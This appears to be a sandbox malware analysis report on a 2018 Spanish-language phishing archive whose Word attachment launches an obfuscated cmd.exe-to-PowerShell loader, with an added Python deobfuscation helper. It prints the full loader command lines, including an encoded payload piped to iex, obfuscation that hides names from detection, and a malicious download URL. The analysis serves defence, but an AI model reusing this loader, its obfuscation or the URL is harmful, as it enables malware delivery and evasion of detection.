| Field | Value |
|---|---|
| File name | Modificación de su tarifa de 07 noviembre 2018.zip |
| Full analysis | https://app.any.run/tasks/89f24b5b-3f5e-438a-baad-80153bc79541 |
| Verdict | Malicious activity |
| Analysis date | November 08, 2018, 14:34:43 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | |
| Indicators | |
| MIME | application/zip |
| File info | Zip archive data, at least v5.1 to extract |
| MD5 | 67A50DCB93DE4624D27109D2FB9DB394 |
| SHA1 | 0282F149E6FB966719C9F8FDE9E32AF2B4704C14 |
| SHA256 | 78B277F3F9ADFF6103B93D1EF354AF3D1BD54A3549263463F5DC3873DE6C1D32 |
| SSDEEP | 768:MhmzCZ+N3UmCKmvm33dt44KCbpO6M98VS3xQJ+N8jBnrnIxndQYDNfDPa0VY0:MgzC415Nm+ndt4tyOoVYCJ88BCyYNrCS |
| Field | Value |
|---|---|
| File type | .zip, ZIP compressed archive (100) |
| ZipFileName | Modificación de su tarifa de 07 noviembre 2018.msg |
| ZipUncompressedSize | 112640 |
| ZipCompressedSize | 46960 |
| ZipCRC | 0x00000000 |
| ZipModifyDate | 2018:11:08 11:19:00 |
| ZipCompression | Unknown (99) |
| ZipBitFlag | 0x0001 |
| ZipRequiredVersion | 51 |

The archive metadata says more than the "Unknown" label suggests: compression method 99 is the WinZip AES extension, bit 0 of the general-purpose flag marks the entry as encrypted, the minimum extractor version 5.1 is what that extension requires, and a stored CRC of 0 is what its AE-2 variant writes. The single .msg entry is therefore password-protected, which is why a mail gateway or scanner without the password cannot inspect it; the recipient is expected to type the password in.
Execution chain: WinRAR extracts the .msg from the archive, Outlook opens it, the attached Acuerdo.doc ("Agreement") is opened in Word (the second Word instance at LOW integrity started with /Embedding is consistent with Protected View), Word spawns cmd.exe, cmd.exe stages a PowerShell decoder expression in the environment variable mfa and starts powershell.exe, which reads that variable back and runs it. The lure file name translates as "Change to your rate of 07 November 2018".

| PID | Path | Parent | Integrity | Description (version) |
|---|---|---|---|---|
| 3132 | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | MEDIUM | WinRAR archiver 5.60.0 (Alexander Roshal) |
| 1404 | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | WinRAR.exe | MEDIUM | Microsoft Outlook 14.0.6025.1000 |
| 2248 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | OUTLOOK.EXE | MEDIUM | Microsoft Word 14.0.6024.1000 |
| 2552 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WINWORD.EXE | LOW | Microsoft Word 14.0.6024.1000, exit code 0 |
| 3584 | C:\Windows\system32\CMD.exe | WINWORD.EXE | MEDIUM | Windows Command Processor 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3908 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.exe | MEDIUM | Windows PowerShell 6.1.7600.16385 (win7_rtm.090713-1255) |

All processes run as user admin; the report attaches no indicators to any of them.

Command lines:

3132: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Modificación de su tarifa de 07 noviembre 2018.zip"

1404: "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Rar$DIb3132.21392\Modificación de su tarifa de 07 noviembre 2018.msg"

2248: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IQA1S2F0\Acuerdo.doc"

2552: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding

3584: CMd.exE /c "SEt mfa=(NEw-objECT sYSTem.Io.strEAmrEaDer( ( NEw-objECT io.comPreSsioN.deflATEsTReam( [io.memOrySTReam][CONvERT]::froMBasE64stRIng( 'TZBRa4MwFIX/Sh4Caekaafuw0SCUdpS6dWPQje5hLxpvl9iYOI2mTvzvU2Hg6/2+c+BcvNsrX4ObmygBbtErWHqGaKckaMtwkux8IqzN1p7nnKMFmKKOKTepF9TvQq+CzYiWGdwogFf9fJRPq+39P0slF6CggjyWQ3YfQWEvv+Nslndcc2l0pspisLblsebLw/Nx7H1DnksrwjTUmsbgibdloOIXQk+ZknZCNmTK8EFw5COyWDwQhj+d8zHoam0hzWbki8x6PiMUbkDYxeQQcjHB5yRCUqN+8rSxed3g7jX00TitTBjvpYLBuUN94ZQFujJXmAdd6XBhUddzZS0PLRdN2/4B' ) ,[sYSTeM.io.cOMPrEssIon.cOMPRESSioNmoDe]::DecomPReSS )), [TeXt.EnCodinG]::asCIi)).rEadtOEnd() ^|iex&& PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( ^& ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) ))"

3908: PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( & ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) ))

The cmd.exe line does two things: `set mfa=...` stores the PowerShell decoder expression (base64 blob, DeflateStream inflate, pipe to iex; the `^` only escapes the pipe for cmd.exe) in the process environment, and `&& powershell ...` starts a child that never carries the payload on its own command line. The child rebuilds the names it needs with the -f format operator, string concatenation and no-op backticks, resolving to `[Environment]::GetEnvironmentVariable('mfa','Process')` and `$ExecutionContext.InvokeCommand.InvokeScript(...)`, so a detection that only inspects the powershell.exe command line for `FromBase64String` or `iex` sees nothing.
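The following is an added analyst helper, not any.run output and not part of the sample. It undoes the three obfuscation layers in the PID 3908 command line (format-operator strings, double-quoted concatenation, inserted backticks) and reproduces the stage-1 decode pipeline (base64, raw DEFLATE, ASCII) so the blob stored in the mfa variable can be inflated offline. The regexes are heuristics written for this sample; the round-trip test vector is constructed here, and the treatment of backticks as no-ops except before PowerShell's documented escape letters is an assumption.

```python
"""Deobfuscate the cmd.exe -> powershell.exe loader recorded for PIDs 3584 and 3908.

Added example, not sandbox output. Stage 1 (PID 3584) puts a decoder expression in the
environment variable "mfa"; stage 2 (PID 3908) fetches it with GetEnvironmentVariable and
runs it with InvokeScript, hiding both names behind -f format strings.
"""
import base64
import re
import zlib

# Stage-2 command line exactly as the report shows it (embedded quotes appear as \").
STAGE2_CMD = r'''PowERShEll $oK8 = [Type]( \"{3}{0}{2}{1}\"-f 'nVIR','nT','Onme','e') ; ${eXEcutIOnCoNTeXt}.\"In`VOKE`co`MmaNd\".(\"{1}{2}{0}\"-f 't','InvOK','EsCrIp' ).Invoke( ( ( & ( \"{0}{1}\"-f 'gC','i') ( \"V\" + \"aRI\"+\"abL\" + \"E:OK8\") ).\"v`Alue\"::( \"{5}{4}{3}{2}{1}{0}{6}\"-f'iAb','aR','MENTV','N','Ro','getENVI','lE').Invoke( 'mFa',(\"{0}{1}\" -f 'PROCe','SS' ) ) ))'''

# Value cmd.exe assigns to mfa in PID 3584 (caret before the pipe removed, as cmd.exe does).
STAGE1_MFA = r"""(NEw-objECT sYSTem.Io.strEAmrEaDer( ( NEw-objECT io.comPreSsioN.deflATEsTReam( [io.memOrySTReam][CONvERT]::froMBasE64stRIng( 'TZBRa4MwFIX/Sh4Caekaafuw0SCUdpS6dWPQje5hLxpvl9iYOI2mTvzvU2Hg6/2+c+BcvNsrX4ObmygBbtErWHqGaKckaMtwkux8IqzN1p7nnKMFmKKOKTepF9TvQq+CzYiWGdwogFf9fJRPq+39P0slF6CggjyWQ3YfQWEvv+Nslndcc2l0pspisLblsebLw/Nx7H1DnksrwjTUmsbgibdloOIXQk+ZknZCNmTK8EFw5COyWDwQhj+d8zHoam0hzWbki8x6PiMUbkDYxeQQcjHB5yRCUqN+8rSxed3g7jX00TitTBjvpYLBuUN94ZQFujJXmAdd6XBhUddzZS0PLRdN2/4B' ) ,[sYSTeM.io.cOMPrEssIon.cOMPRESSioNmoDe]::DecomPReSS )), [TeXt.EnCodinG]::asCIi)).rEadtOEnd() |iex"""

# "{1}{0}" -f 'b','a'   (optional backslash before each quote, as in the report's rendering)
_FORMAT_RE = re.compile(r'\\?"((?:\{\d+\})+)\\?"\s*-f\s*' r"((?:'[^']*'\s*,\s*)*'[^']*')")
# "a" + "b" + "c"  (double-quoted literals only)
_CONCAT_RE = re.compile(r'(?:\\?"[^"\\]*\\?"\s*\+\s*)+\\?"[^"\\]*\\?"')
_BLOB_RE = re.compile(r"fromBase64String\(\s*'([A-Za-z0-9+/=]+)'", re.IGNORECASE)


def resolve_format_operator(text: str) -> str:
    """Rebuild each -f expression the way .NET String.Format would; str.format is equivalent
    for plain positional {n} templates."""
    def _sub(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        try:
            return '"' + m.group(1).format(*args) + '"'
        except IndexError:  # template references a missing argument: leave it visible
            return m.group(0)
    return _FORMAT_RE.sub(_sub, text)


def join_string_concats(text: str) -> str:
    """Fold "V" + "aRI" + "abL" + "E:OK8" into "VaRIabLE:OK8"."""
    return _CONCAT_RE.sub(
        lambda m: '"' + "".join(re.findall(r'\\?"([^"\\]*)\\?"', m.group(0))) + '"', text)


def strip_noop_backticks(text: str) -> str:
    """Drop backticks that do not start a PowerShell escape (`0 `a `b `e `f `n `r `t `u `v).
    Assumption: any other backtick is padding and PowerShell yields the bare character."""
    return re.sub(r"`(?![0abefnrtuv])", "", text)


def deobfuscate(text: str) -> str:
    return strip_noop_backticks(join_string_concats(resolve_format_operator(text)))


def extract_b64_blob(expr: str) -> str:
    m = _BLOB_RE.search(expr)
    if not m:
        raise ValueError("no FromBase64String('...') literal found")
    return m.group(1)


def inflate_stage(b64_blob: str) -> str:
    """Same pipeline as the loader: FromBase64String -> DeflateStream(Decompress) -> ASCII.
    DeflateStream is raw DEFLATE with no zlib header, hence wbits=-15."""
    raw = base64.b64decode(b64_blob)
    return zlib.decompress(raw, wbits=-15).decode("ascii", errors="replace")


def deflate_stage(script: str) -> str:
    """Inverse of inflate_stage; only used to build a constructed round-trip test vector."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(script.encode("ascii")) + c.flush()).decode("ascii")


if __name__ == "__main__":
    print(deobfuscate(STAGE2_CMD))
    try:
        print(inflate_stage(extract_b64_blob(STAGE1_MFA)))
    except (ValueError, zlib.error, base64.binascii.Error) as exc:
        print("stage-1 blob did not inflate:", exc)
```

Running the script prints the stage-2 line with `"enVIROnmenT"`, `"InvOKEsCrIpt"`, `"gCi"`, `"VaRIabLE:OK8"` and `"getENVIRoNMENTVaRiAblE"` in place of the format expressions, which is enough to match it against a case-insensitive `GetEnvironmentVariable` / `InvokeScript` rule; the inflated stage-1 text is whatever the blob on this page decodes to and is not reproduced here.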
| PID | Process | Key | Name | Value |
|---|---|---|---|---|
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP | |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon | |
| 3132 | WinRAR.exe | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | LanguageList | en-US |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\Modificación de su tarifa de 07 noviembre 2018.zip |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120 |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80 |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120 |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | mtime | 100 |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | {0006F045-0000-0000-C000-000000000046} {000214FA-0000-0000-C000-000000000046} 0xFFFF | 0100000000000000E8806C3F7077D401 |
| 3132 | WinRAR.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | {0006F045-0000-0000-C000-000000000046} {000214EB-0000-0000-C000-000000000046} 0xFFFF | 01000000000000009C45713F7077D401 |

All recorded registry writes (operation: write) come from WinRAR updating its own interface settings, archive history and the shell-extension cache. The report records no registry activity from Outlook, Word, cmd.exe or PowerShell, so nothing here is a persistence mechanism; the only lasting trace is the archive path in WinRAR's ArcHistory.
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRC714.tmp.cvr | | | |
| 1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DFF8830F60D757D89E.TMP | | | |
| 1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IQA1S2F0\Acuerdo (2).doc\:Zone.Identifier:$DATA | | | |
| 2248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE913.tmp.cvr | | | |
| 2248 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_4B655553-6188-4851-9352-C13634A63188.0\FDB1A2CB.doc\:Zone.Identifier:$DATA | | | |
| 2552 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_4B655553-6188-4851-9352-C13634A63188.0\~DF4DB202B38B5B47C7.TMP | | | |
| 3908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\684T394A4R6GW8ZF2TS0.temp | | | |
| 3132 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3132.21392\Modificación de su tarifa de 07 noviembre 2018.msg | msg | C56C3EC4365B0F78538DCDC56FBDCC5B | F47B4AA140D8A5CBDF91BE059F2C8AA3AEB58A26CB2808D8260D137D716D8F2A |
| 1404 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | 0DC7158969B26FA940C1025CBAE11D2B | B2C6B49B06913A6C99B155096DA546DADCE09344B5F0988F7A22C8D6705F2306 |
| 2248 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 4A53899C9316D0214DE360F42462362A | 99FFF3F4D07F6E400FA678CFAB626D7AED863D56CA61EF242FA4C79A2EB17823 |

Empty hash cells mean the report did not hash the file. The two `Zone.Identifier:$DATA` entries are Outlook and Word writing the mark-of-the-web onto their saved copies of the attachment, which is what sends the document into Protected View; the only hashed artifacts are the extracted .msg and two Office owner files (~$rmalEmail.dotm, ~$Normal.dotm), not the Acuerdo.doc payload itself. No file was written by cmd.exe, and powershell.exe only touched a jump-list temp file, consistent with the payload staying in memory.
HTTP requests:

| PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 3908 | powershell.exe | GET | | 69.163.156.184:80 | http://www.seosyd.com/IyThn3I | US | | | malicious |
| 1404 | OUTLOOK.EXE | GET | | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | | | whitelisted |

Connections:

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 1404 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
| 3908 | powershell.exe | 69.163.156.184:80 | www.seosyd.com | New Dream Network, LLC | US | malicious |

DNS requests:

| Domain | IP | Reputation |
|---|---|---|
| config.messenger.msn.com | | whitelisted |
| www.seosyd.com | | malicious |

No HTTP status code, content type or size was recorded for the PowerShell GET, so the report does not show whether the next stage was actually served; the Outlook request is ordinary Messenger configuration traffic.